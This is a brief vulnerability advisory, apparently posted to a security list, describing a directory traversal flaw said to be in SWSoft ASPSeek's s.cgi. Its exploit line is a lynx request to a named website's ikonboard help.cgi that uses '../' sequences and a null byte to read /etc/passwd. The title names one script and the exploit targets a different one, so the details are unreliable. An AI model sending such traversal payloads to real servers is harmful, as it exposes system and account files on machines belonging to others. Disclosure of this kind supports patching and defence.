Name   : SWSoft ASPSeek s.cgi script "show files" Vulnerability.
Problem: Adding the string "/../../../../" to an URL allows an
         attacker to view any file on the server, and
         also list directories within the server.

Exploit:

  lynx http://www.gmc-online.de/cgi-bin/ikonboard/help.cgi?helpon=../../../../../etc/passwd%00
                                                     by: _TacK_ (TacK@ole.com)

(Tested in Server: Apache/1.3.9 (Unix) PHP/4.0.3pl1 FrontPage/4.0.4.3)